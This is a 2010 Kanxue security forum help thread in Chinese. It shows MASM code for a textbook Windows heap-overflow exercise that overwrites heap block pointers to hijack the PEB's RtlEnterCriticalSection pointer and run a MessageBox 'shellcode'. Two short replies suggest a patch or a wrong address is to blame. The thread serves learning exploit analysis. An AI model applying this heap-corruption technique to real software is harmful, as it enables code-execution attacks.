[求助]修改了尾块但是不能成功溢出，而是弹错误对话框，何解？-《0day:软件漏洞分析技术》-看雪-安全社区|安全招聘|kanxue.com

[求助]修改了尾块但是不能成功溢出，而是弹错误对话框，何解？

2010-3-1 13:07 4410

[求助]修改了尾块但是不能成功溢出，而是弹错误对话框，何解？

岭南散人

2010-3-1 13:07

4410

.386
.model flat, stdcall  ;32 bit memory model
option casemap :none  ;case sensitive
include heapoverflow.inc

.data
heap dd ?
h1 dd ?
h2 dd ?
myaddr dd ? ;保存正常的ntdll.RtlEnterCriticalSection地址

.code
myShellcode proc？
assume fs:nothing
mov eax,fs:[030h]
add eax,020h
mov ebx,myaddr ;这里修复正常的指针
mov [eax],ebx
invoke MessageBox,0,0,0,MB_OK
ret

myShellcode endp
start:

invoke HeapCreate,HEAP_NO_SERIALIZE,01000h,0
mov heap,eax
invoke HeapAlloc,heap,HEAP_NO_SERIALIZE,016h
mov h1,eax
mov edi,eax
add edi,32
mov [edi],offset myShellcode
;int 3
add edi,4
assume fs:nothing
mov eax,fs:[030h]
add eax,020h  ;eax是地址
mov ebx,[eax] ;ebx是指针值
mov myaddr,ebx
mov [edi],eax

invoke HeapAlloc,heap,HEAP_NO_SERIALIZE,0120h
mov h2,eax
invoke ExitProcess,0
invoke GetModuleHandle,NULL
mov hInstance,eax

invoke InitCommonControls
invoke DialogBoxParam,hInstance,IDD_DIALOG1,NULL,addr DlgProc,NULL
invoke ExitProcess,0

;########################################################################

DlgProc proc hWnd:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM

mov eax,uMsg
.if eax==WM_INITDIALOG

.elseif eax==WM_COMMAND

.elseif eax==WM_CLOSE
invoke EndDialog,hWnd,0
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret

DlgProc endp

end start

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

上传的附件：

QQ截图未命名.png （6.08kb，87次下载）

收藏・0

点赞・0

打赏

最新回复 (2)
岭南散人雪币： 334 活跃值： (92) 能力值： ( LV7，RANK：100 ) 在线值：发帖 47 回帖 282 粉丝 1 关注私信	岭南散人 1 2010-3-1 13:07 2 楼 0 是不是打上了补丁所致
黑色精灵雪币： 10 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 28 粉丝 0 关注私信	黑色精灵 2010-4-15 13:42 3 楼 0 兄弟你地址错了！~~~~
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复